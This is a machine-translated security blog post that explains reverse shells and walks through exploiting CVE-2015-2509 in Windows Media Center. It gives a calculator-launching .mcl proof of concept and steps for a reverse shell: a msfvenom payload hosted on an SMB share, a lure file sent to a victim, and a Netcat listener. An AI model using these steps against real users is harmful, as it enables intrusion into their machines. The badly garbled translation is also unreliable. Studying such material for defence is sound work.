Reverse Shell with Windows Media Center remote execution vulnerability, CVE-2 0 1 5-2 5 0 9 use-vulnerability warning-the black bar safety net

2015-09-21T00:00:00
ID MYHACK58:62201567218
Type myhack58
Reporter 佚名
Modified 2015-09-21T00:00:00

Description

In this article, we will briefly introduce the reverse shell and the Windows Media Center vulnerabilities CVE-2 0 1 5-2 5 0 9)vulnerabilities, and finally a detailed description of the vulnerability of the method. 0×0 1 reverse shell The so-called shell, everybody is not strange, is nothing more than a command line interface. If it by platform classification, basically can be roughly divided into two categories: for web level and system level. In addition, according to the connection manner, divided into active connection and passive connection, active connection is a Bind Shell, a passive connection is a Reverse Shell, that is, herein said reverse shell, in particular as shown below. Below we talk about the active connection and passive connection. Bind Shell is a user with BSAH, will be a shell bound to a local port, so can anyone in the local network to send commands. A reverse shell works by the remote computer will be your shell to send to a specific user, rather than the shell bound to a port. When the remote machine in the firewall and other things back, the reverse shell this technique will become very useful. Many times, the attackers invaded a server, they will set up a reverse shell, in the future they will be able to pass the shell to easily access the remote computers, popular said, is to leave a back door. 0×0 2 CVE-2 0 1 5-2 5 0 9 vulnerability The vulnerability is in Windows Media Center found, the following is quoted from Microsoft for the vulnerability description: · If the Windows Media Center open specially crafted to reference the malicious code of the Media Center use (. mcl)files, this vulnerability could allow remote code execution. Successful exploitation of this vulnerability an attacker can obtain the current user with the same user permissions. With administrative user rights of the customer compared to accounts are configured to have fewer user rights on the system of customers affected is smaller. · If Windows Media Center opens a reference to the malicious code via a specially designed Media Center link (. mcl)files, the vulnerability could allow remote code execution. Successful exploitation of this vulnerability an attacker can obtain the current user with the same user permissions. Those accounts are configured to have fewer user rights than users with administrative user rights of the user affected is smaller. · To exploit this vulnerability, an attacker must convince a user installed on the local computer . mcl file. And then, probably from the attacker-controlled location . mcl file references of the malicious code. This security update addresses the vulnerabilities by correcting the processing Media Center link file the way to fix the vulnerability. Well, the following began to introduce us to the vulnerability of the specific use of the method. 0×0 3 build exploits the environment The following is herein used to some of the necessary tools: • Virtualbox • Kali Linux running in Virtualbox among • Windows 7 system, running on Virtualbox among Note that, in connection Kali and Windows 7. When connected the way it should select“Host Only Adapter” in. 0×0 4 testing for vulnerabilities If you want to test the vulnerability of the words, you'll need to on a Windows System open the Notepad program, and then enter the following: run=”c:\windows\system32\calc.exe”> Then, save the file, note that the extension should be selected. mcl, that is the type of Media Center use (. mcl)files.

! Figure 1: The New named calc. mcl file For like the author so lazy to say, there is a more 省劲 method, is to exploit-db download a corresponding Python script, and then run it you can get this POC file. Well, here we talk about specific steps. This Python script download address: https://www.exploit-db.com/exploits/38151/ If you run this file, it will generate a file called Music. mcl file, but its contents with our previous use Notepad to create the file is the same as the same.

! Figure 2: The use of python scripts to create the Music. mcl file Well, now we have to run this file, immediately will pop up a calculator, specifically as shown below.

! Figure 3: run the calc. mcl 0×0 5 pop-up shell In the following, we describe how to exploit this vulnerability. According to Microsoft's statement, to exploit this vulnerability, an attacker must convince a user installed on the local computer . mcl file. And then, probably from the attacker-controlled location . mcl file references of the malicious code. This is the successful exploitation of this vulnerability required the specific steps: 1. The attacker must create a malicious executable file; 2. This file must be able to pass a UNC path for malicious mcl File Download; 3. Creates a malicious. mcl file, and then send it to the victim; 4. Establish a listening program; 5. When the victim open this. mcl file, we will get a shell. Therefore, the first thing to do is in our machine to create a malicious files, and make it possible through a UNC path to access, in this case, our malicious mcl file to download it, and it is executed to return a reverse shell. Note that, in order to create a return to reverse the shell of a malicious executable file that we can use msfvenom to the“windows/shell_reverse_tcp”payload, it listens 4 4 3 port. In addition, I also on your machine to attacks that create a SMB share files. The following shows that will be passed to the victims of the exploit. mcl file of the final version.

! We need to try to this exploit. mcl delivered to the victim's hands, and think of a way to let him open this file. Configure Netcat make it listen 4 4 3-port, because our payload using this port. ! Figure 4: Make Netcat listening 4 4 3-port The completion of the work, open the exploit. mcl file, as shown below. !

[1] [2] next